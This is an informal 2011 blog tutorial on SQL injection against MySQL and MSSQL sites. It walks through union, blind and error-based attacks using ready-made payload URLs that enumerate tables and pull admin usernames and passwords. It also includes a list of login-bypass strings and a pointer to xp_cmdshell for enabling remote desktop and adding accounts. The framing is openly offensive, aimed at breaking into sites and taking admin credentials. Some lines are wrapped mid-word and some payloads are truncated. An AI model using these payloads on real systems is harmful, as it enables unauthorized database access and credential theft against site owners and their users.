Full Sql Injection Tutorial - Mysql + Mssql

Posted by SiddhartH SolankI On 03:20

#####################################################################
# Title: Advanced Sql Injection including Mysql,Mssql & a guide to oracle
# Date : 22 January 2011
# Author: Cyb3R_ShubhaM aKa L0c4lr00T
# Email: l0c4lr00t@yahoo.in
# Facebook: fb[dot]me/yoShubH
# My Teams : Indishell,IW,AoH,SWATS,Team StuXnet etc.
# Contents=> Mysql- Blind + union
=> Mssql- Blind + Union + error based
// => For oracle plz refer to- http://dl.packetstormsecurity.net/papers..._Web_2
.pdf :)
# Suggested Automated tools=> Havij: itsecteamc.com
# Vulnerability scanners
=> Acunetix wvs
=> Jsky
================================================================================
?==========
Hmmm... So Let's Start, I think it's my first paper being written for you all ;)
I don't remember the exact definition of sql Injection so
I'll get that for you from google ;)
Q. What is Sql Injection ?
A. SQL injection is a code injection technique that exploits a security vulnerab
ility occurring in the database layer of an application.
I don't want to boar you ;) so a simple short definiton is above..
Types of Sql Injection# Blind
# Union
# Error //not availble in mysql
Google them to get the definitions :)..!
Injection types# String- http://test.com/index.php?id=1 having 1=1
# Integer- http://test.com/index.php?id='1 having 1=1
hope you can see the difference.
Server types I know & I'll teach you# Mysql
# Mssql
================================================================================
?===========

################################################################################
?###########
Let's start with Mysql:
Mysql has 2 types only as mentioned above.you need to know the following things
about the DB you are attacking# Number of columns
# Table names
# column names
# Let's start with union Attack, the most common, every n00b should no it :p=> http://test.com/index.php?id=1 order by 10-^ This gives me an error
Let's again try
=> http://test.com/index.php?id=1 order by 7-^ This gives me an error
Let's try again
=> http://test.com/index.php?id=1 order by 5-Whoa !! the page is Loading normally
It means, Number of columns => 5
you can do it with mssql as well.
# Now the next partI'm using union select statement.
=> http://test.com/index.php?id=1 union all select 1,2,3,4,5-If it doesn't gives you anything, change the first part of the query to a negati
ve value.
=> http://test.com/index.php?id=-1 union all select 1,2,3,4,5-It'll show some number on you screen. In my case it is 2. Now we know that colum
n 2 will echo data back to us. :D
# getting Mysql version
=> http://test.com/index.php?id=-1 union all select 1,@@version,3,4,5-If you do not get with this try this=> http://test.com/index.php?id=-1 union select 1,version()),3,4,5-Now you will get get the version name
it can be# 5+
# 5>
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Table extraction for version 5+ :

=> http://test.com/index.php?id=-1 union all select 1,group_concat(table_name),3
,4,5 from information_schema.tables-It'll show a lot of tables, if you want to get into the site, usually you need t
o get the admin's login info :D
So, In my case I need to exploit into a table named => admin
which contains information, I need :D
Now I got the Tables names & I need to extract the column names from them so the
query will be=> http://test.com/index.php?id=-1 union all select 1,group_concat(column_name),
3,4,5 from information_schema.columns where table_name=admin-This will show you the column names inside the table Admin. if it gives you an e
rror you need to change the text value of admin to mysql char.
I use hackbar, a Firefox addon to do so.
so char of admin is =>CHAR(97, 100, 109, 105, 110)
therefore the query will be=> http://test.com/index.php?id=-1 union all select 1,group_concat(column_name),
3,4,5 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 1
10)-It show the columns names to me. In my case they are#
#
#
#

user_name
user_password
sex
uid

We only need to know username & pass so we reject the rest two. Okay ? :D
The next query will be for extracting the final data I need- :D
=> http://test.com/index.php?id=-1 union all select 1,group_concat(user_name,0x3
a,user_password),3,4,5 from admin-where 0x3a is the hex value of => :
VOILA !
I got the username & pass, it is => shubham:password
password can also be encrypted. So you can use few online decrypters or a softwa
re I know => Password Pro
This was all for Mysql 5+
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Let's Start with mysql 5>
Version 4 or below 5 does not contain any => Information_schema

so you have to guess them, Like people guess while playing KBC (who want to be a
millionaire)
hahaha :D
we know the number of columns that is 5.
=> Let's Start guessing the table:
=> http://test.com/index.php?id=-1 union all select 1,2,3,4,5 from users-^ This one gives me error
=> => http://test.com/index.php?id=-1 union all select 1,2,3,4,5 from Admin-^ Voila I guessed the right, you must be thinking ShubhaM is a Genious xD :p
=> Next part is Guessing the columns:
as we had done earlier & had found the vulnerable column is 2...so lets process
further.
guess something similar to a username.
=> http://test.com/index.php?id=-1 union all select 1,user,3,4,5 from admin-^ got error. Retrying...
=> http://test.com/index.php?id=-1 union all select 1,username,3,4,5 from adminHurray ! It gotta work baby & I got the username :D...!
=> let's guess the password column now
=> http://test.com/index.php?id=-1 union all select 1,pass,3,4,5 from admin-^ got an error
one more try=> http://test.com/index.php?id=-1 union all select 1,password,3,4,5 from adminhahaha...got the pass !!!
This is the end of Mysql 5> union.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
?XXXXXXXXXXXXXXXXXX
# Mysql BlindMost fu*king part. I really hate this. :X :P :X
Q. what is Blind Sql Injection ?
A. Blind SQL Injection is used when a web application is vulnerable to an SQL in
jection but the results of the injection are not visible to the attacker. The pa
ge with the vulnerability may not be one that displays data but will display dif
ferently depending on the results of a logical statement injected into the legit
imate SQL statement called for that page. This type of attack can become time-in
tensive because a new statement must be crafted for each bit recovered. There ar
e several tools that can automate these attacks once the location of the vulnera

bility and the target information has been established.

^ copied it from wikipedia ;)
hope you understood. huh !! its 1:11am here in India...I'm very tired :'( :P :P
but no school tommorow coz it is sunday :D
Let's come to the point, enough of fun now !!
# when we want to test for mysql blind=> http://test.com/news.php?id=5 and 1=1
^ this is always trues :D & page loads normally :))
=> http://test.com/news.php?id=5 and 1=2
^ this one is Fake :X
so if some text, picture or some content is missing on returned page then that s
ite is vulrnable to blind sql injection.
# Getting Mysql version in blind sqlito get the version in blind attack we use substring
i.e
=> http://test.com/news.php?id=5 and substring(@@version,1,1)=4
# this should return TRUE if the version of MySQL is 4.
# replace 4 with 5, and if query return TRUE then the version is 5.
# Test if subselect works
when select don't work then we use subselect
i.e
=> http://test.com/news.php?id=5 and (select 1)=1
# if page loads normally then subselects work.
Now, :D Let's see if we have access to => Mysql.user
=> http://test.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1
if page loads normally we have access to mysql.user and then later we can pull s
ome password usign load_file() function and OUTFILE.
# Check table and column names
# This is part when guessing of the game KBC works :D :))
that is,
=> http://test.com/news.php?id=5 and (select 1 from users limit 0,1)=1
(with limit 0,1 our query here returns 1 row of data, cause subselect returns on

ly 1 row, this is very important.)

# then if the page loads normally without content missing, the table users exits
.
# if you get FALSE (some article missing), just change table name until you gues
s the right one :)
# let's say that I have found that table name is users, now what we need is colu
mn name !! :D
# The same as table name, we start guessing.
=> http://test.com/news.php?id=5 and (select substring(concat(1,password),1,1) f
rom users limit 0,1)=1
#if the page loads normally we know that column name is password (if we get fals
e then try common names or just guess)
here we merge 1 with the column password, then substring returns the first chara
cter (,1,1)
# Pull data from database
I found table users i columns username password so I'm gonna pull characters fro
m that.
=> http://test.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3
a,password) from users limit 0,1),1,1))>80
ok this here pulls the first character from first user in table users.
substring here returns first character and 1 character in length. ascii() conver
ts that 1 character into ascii value
# and then compare it with simbol greater then > .
# so if the ascii char greater then 80, the page loads normally. (TRUE)
# keep trying until get false.
=> http://test.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3
a,password) from users limit 0,1),1,1))>95
# we get TRUE, keep incrementing :D
=> http://test.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3
a,password) from users limit 0,1),1,1))>98
TRUE again, higher :D
=> http://test.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3
a,password) from users limit 0,1),1,1))>99
FALSE!!!
:D :D
# so the first character in username is char(99). Using the ascii converter we k

now that char(99) is letter 'c'.

=>> then let's check the second character.
# http://test.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a
,password) from users limit 0,1),2,1))>99
# Note that i'm changed ,1,1 to ,2,1 to get the second character. (now it return
s the second character, 1 character in lenght)
=> http://test.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3
a,password) from users limit 0,1),1,1))>99
TRUE, the page loads normally, higher.
=> http://test.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3
a,password) from users limit 0,1),1,1))>107
# FALSE, lower number.
=> http://test.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3
a,password) from users limit 0,1),1,1))>104
# TRUE, higher.
http://test.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,p
assword) from users limit 0,1),1,1))>105
# FALSE!!!
# we know that the second character is char(105) and that is 'i'. We have 'ci' s
o far
# so keep incrementing until you get the end. (when >0 returns false we know tha
t we have reach the end).
It is very very fucking boaring :P :'( :X
There are some tools for Blind SQL Injection, i think sqlmap is the best, but i'
m doing everything manually,
cause that makes you better INJ3CT0R :D
Finishing this Mysql part here. :P :P
next is mssql :P
==
##
My head is paining like hell...I'll continue after few hours ;)
Lolz...I'm back after 24 hours :D
Mssql is the best part, I like it !! due to many reasons...everyn00b can't do it
:P
I had learnt mssql injection from very good people like- Stranger(ICA),CWH Under
ground [www.milw0rm.com/author/1456] & a book given to be my friend d3c0mil3r et
c.
# MSsql Injection-

Hope you know how to test sqli vulnerablity, So I'm leaving that part.
# Bypassing Authenctication- common for n00bs:
+--+
| ' or 1=1 -- |
| a' or 1=1 -- |
| " or 1=1 -- |
| a" or 1=1 -- |
| ' or 1=1 # |
| " or 1=1 # |
| or 1=1 -- |
| ' or 'x'='x |
| " or "x"="x |
| ') or ('x'='x |
| ") or ("x"="x |
| ' or username LIKE '%admin% |
+--+
| USERNAME: ' or 1/* |
| PASSWORD: */ =1 -- |
+--+
| USERNAME: admin' or 'a'='a |
| PASSWORD: '# |
+--+
=> Mssql Injection with Union Attacl:
I love Union <3
I've this site to test upon my power => http://test.com/news.asp?id=1
Ok, Let's Start# First find out the number of columns, counting one by one is boaring :P so I'l
l use "Hit & Trial Method", that I had learnt somewhere in Maths :D
ok. => http://test.com/news.asp?id=1 order by 6-We'll hit, until we get a error like this one[error] Microsoft SQL Native Client error '80040e14'
The ORDER BY position number 5 is out of range of the number of items in the sel
ect list.
/showthread.asp, line 9
[/error]
again trying to hit,
=> http://test.com/news.asp?id=1 order by 4-whoa !! worked :D
# Now I'll use union again=> http://test.com/news.asp?id=1 and 1=2 union select 11,22,33,44-# We will see "11" or "22" or "33" or "44" appeared on some point in returned pa
ge.
WOW ! i found 44 on my laptop's screen, so i'll replace 44 with @@version

=> http://test.com/news.asp?id=1 and 1=2 union select 11,22,33,@@version-^ So, this gives me the version Information.
Let's continue in grabbing the rest data, I'm using information_schema, as like
we did in Mysql :P
I think concat do not works in mssql, never tried also, if working also, I don't
know how to ! :P coz I'm just a 10th std student. No idea abt sql :P
So the next,
=> http://test.com/news.asp?id=1 and 1=2 UNION SELECT 11,22,33,table_name from i
nformation_schema.tables-^ this gives me the name of first table, i.e => threads
I'll use the first table to get the next one & so on...untill u get what u want
=> http://test.com/news.asp?id=1 and 1=2 UNION SELECT 11,22,33,table_name from i
nformation_schema.tables where table_name not in ('threads')-^ This gives me the name of the next table, i.e.=> users :D
Users is the required table for me which contains the info I need :D
=> http://test.com/news.asp?id=1 and 1=2 UNION SELECT 11,22,33,column_name from
information_schema.columns where table_name='users'-^ this gives me the column name,i.e,uname. as we did to find the tables. same we
'll do with columns. Ok? :)
=> http://test.com/news.asp?id=1 and 1=2 UNION SELECT 11,22,33,column_name from
information_schema.columns where table_name='users' and
column_name not in ('uname')-^ this gives me the next column,i.e, upass :D
Lolz, now I need data from these two columns :D
=> http://site.com/news.asp?id=1 and 1=2 UNION SELECT 11,22,33,uname from users^ same with upass
this time my uname is admin. so to find next row, we do
=> http://site.com/news.asp?id=1 and 1=2 UNION SELECT 11,22,33,uname from users
where uname not in ('admin')-further as well, we can extract the rest of the data. hope you understood this m
uch !!
Now next part is mssql blind :D
==
# Mssql blind :
# testing-

=> http://test.com/news.asp?id=1 and 1=1

another one => http://test.com/news.asp?id=1 and 1=2
If these two give different results that simply means that the fucking site is v
ulnerable to Mssql blind :D :P :x
# I'm copy pasting some queries from my notes :P :D
=> http://test.com/news.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(d
b_name(0)))AS varchar(8000)),1,1)),0)>90
^ your idea of picking the ascii code can be Different. :D :P
^ valid :(
hit it againhttp://test.com/news.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_n
ame(0)))AS varchar(8000)),1,1)),0)>120
^
in this case result will be like 1=2
next we try,
http://test.com/news.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_n
ame(0)))AS varchar(8000)),1,1)),0)>105
I
#
#
#
#

tried with these>112-Invalid

>108-Valid
>110-Invalid
>109-Invalid

So therefore, ascii value is equal to => 109 :)

=> http://test.com/news.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(d
b_name(0)))AS varchar(8000)),1,1)),0)=109
Rest on your own...keep manipulating to get info :P
# Getting Table name- one of the hardest part, finding each character of table i
s really boaring :P
use automated tools for this :P the queries are very complicated here :x
Let's start=> http://test.com/news.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT TOP 1 L
OWER(name)
FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 1 LOWER(name) FROM s
ysObjects WHERE xtYpe=0x55))
AS varchar(8000)),1,1)),0)>97
^ this one is used to get first character of first table.
second character:
=> http://test.com/news.asp?id-1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT TOP 1 L
OWER(name)
FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 1 LOWER(name) FROM s
ysObjects WHERE xtYpe=0x55))
AS varchar(8000)),2,1)),0)>97

and so on....I'm not gonna dwell on it :P

# Getting column name=> http://test.com/news.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT TOP 1 L
OWER(name)
FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 1 LOWER(name) FROM s
ysObjects WHERE xtYpe=0x55))
AS varchar(8000)),2,1)),0)>97
Change the table name to mssql char, example if it is users change it tochar(117)+char(115)+char(101)+char(114)
# 2nd character=> http://test.com/news.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT p.name
FROM (SELECT (SELECT COUNT(i.colid)rid FROM
syscolumns i WHERE(i.colid<=o.colid) AND id=(SELECT id FROM sysobjects WHERE nam
e='tablename'))x,name FROM syscolumns o WHERE
id=(SELECT id FROM sysobjects WHERE name='tablename')) as p WHERE(p.x=1))AS varc
har(8000)),2,1)),0)>97
& so on....Now finishing this mssql blind.
==
### Mssql Error basedTypes# ODBC Error Message Attack with "HAVING" and "GROUP BY"
# ODBC Error Message Attack with "CONVERT"
# Soap (not including soap in this paper)
Let's start with
# ODBC Error Message Attack with "HAVING" and "GROUP BY"--->
I'll inject having command now,
=> http://test.com/news.asp?id=1 having 1=1-getting some error...err
[error]
Microsoft OLE DB Provider for SQL Server error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'news.news_id' is invalid
in
the select list because it is not contained in an aggreate function and there is
no GROUP BY clause.
[/error]
it shows table name is news & one column => news_id is contained in it :P
# combining having & group by
=> http://test.com/news.asp?id=1 GROUP BY news.news_id HAVING 1=1-[error]
Microsoft OLE DB Provider for SQL Server error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'news.news_author' is inva
lid in

the select list because it is not contained in an aggreate function and there is
no GROUP BY clause.
[/error]
it shows second column of first table is news_author :D
third column can be obtained using the 2nd one
=> http://test.com/news.asp?id=1 GROUP BY news.news_id,news.news_author HAVING 1
=1-[error]
Microsoft OLE DB Provider for SQL Server error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'news.news_detail' is inva
lid in
the select list because it is not contained in an aggreate function and there is
no GROUP BY clause.
[/error]
third column is => news_detail
and so on...
Now,
## ODBC Error Message Attack with "CONVERT"here I'll show you how to grab, MSSQL_Version, DB_name, User_name.
=> http://test.com/news.asp?id=1+and+1=conv...version)-[error]
Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005
- 9.00.3042.00 (Intel X86) Feb 9 2007
22:47:07 Copyright 1988-2005 Microsoft Corporation Express Edition on Windows NT
5.2 (Build 3790: Service Pack 1)
' to data type int.
/page.asp, line 9
[/error]
therefore I know => the version of MSSQL and OS (Windows 2003 Server)
other things u can grab by replacing @@version with# db_name()
# user_name()
if in the user name it gives => Sa
it means you can use Xp_cmdshell, that will I'll tell u later, to enable rdp i.e
. remote desktop & hack the whole box :P :D
# Obtaining tables=> http://site.com/news.asp?id=1+and+1=conv...tables))-Result is threads, so
Next one,

=> http://test.com/news.asp?id=1+and+1=conv...able_name+
not+in+('threads')))-& so now...you can continue further now.
Next table for me is users that i founded using the threads one..! So now i need
columns from the table threads, Okay ? :)
# Finding columns
=> http://test.com/news.asp?id=1+and+1=conv...users'))-[error]
Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'uname' to data type int.
/showthread.asp, line 9
[/error]
First column is Uname ;)
So I continue
=> http://test.com/news.asp?id=1+and+1=conv...e='users'+
and+column_name+not+in+('uname')))-^ as we had done earlier :D
[error]
Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'upass' to data type int.
/showthread.asp, line 9
[/error]
For getting more column names,
we only append a known table list like that in getting table names.
# extracting data
=> http://test.com/news.asp?id=1+and+1=conv...+users))-[error]
Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'admin' to data type int.
/page.asp, line 9
[/error]
same with upass ;)
Rest you are now on your own In mssql ;)
I'm leaving it here....it is much of done !!! now the thing left is that to use
your brain. ;)
# Soap InjectionLeaving this part :P I'll later make a paper on it ;)
end of MSsql ... :P
# Xp_cmdshell
I'd recommend to use some automated tools, I'm not in mood of writing on xp_cmds
hell, though it consists of simple cmd commands to activate rdp & using net user

u can add an account. but complicated queries.

==
##
# References#
#
#
#
#

Hackforums.net
Hackersbay.in
Academyofhacking.com
Indishell.in
packetstormsecurity.org

##
Greetz To###
greetz- C00lt04d,Cyb3rgr00f,Reb0rn,c0d3br34k3r,3thicaln00b,Cyb3rS4m,g00gl3 w4rri
0r & All my friends at AOH & Indishell.
special thanks- H4ck0lic, Bad Man :)
##3
End of this paper